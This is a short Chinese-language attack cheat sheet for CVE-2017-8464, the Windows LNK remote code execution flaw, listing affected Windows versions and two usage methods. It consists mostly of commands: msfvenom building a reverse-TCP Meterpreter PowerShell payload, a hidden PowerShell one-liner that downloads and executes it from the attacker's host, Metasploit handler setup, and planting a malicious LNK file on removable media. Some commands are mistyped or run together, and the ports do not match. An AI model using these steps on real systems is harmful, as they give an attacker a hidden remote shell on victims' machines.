常用CVE
CVE-2017-8464
受影响版本
Windows 7/Windows 8.1/Windows RT 8.1/Windows 10/Windows Server 2008/Windows Server 2008 R2/Windows Server 2012/Windows Server 2012 R2/Windows Server 2016
使用方式一
-kali下
1.msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=KaliIP LPORT=444 -f psh-reflection>1.ps1
2.cp /root/1.ps1 /var/www/html
-目标机器
1.powershell -windowstyle hidden -exec bypass -c "IEX (New-ObjectNet.WebClient).DownloadString('http://kaliIP/1.ps1');test.ps1"
-Kali下
msfconsole
use exploit/multi/handler
set PAYLOAD windows/x64/meterpreter/reverse_tcp
set LHOST KaliIP
set LPORT 4444
exploit
使用方式二
-kali下
下载 - https://github.com/rapid7/metasploit-framework/archive/master.zip
将压缩包内modules/exploits/windows/fileformat中的cve_2017_8464_lnk_rce.rb复制到目录/usr/share/metasploit-framework/modules/exploits/windows/fileformat
将压缩包内data/exploits中的cve-2017-8464文件夹复制到/usr/share/metasploit-framework/data/exploits
打开终端在/root/.msf4/local中生成我们想要的文件
msfconsole
use exploit/windows/fileformat/cve_2017_8464_lnk_rce
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST [你的IP地址]
exploituse multi/handlerset paylaod windows/meterpreter/reverse_tcp set LHOST [你的IP地址] run
-目标机
将可移动磁盘插入靶机中,如果靶机开启了自动播放,选择浏览文件时即可回弹
使用方式三 -POC/EXP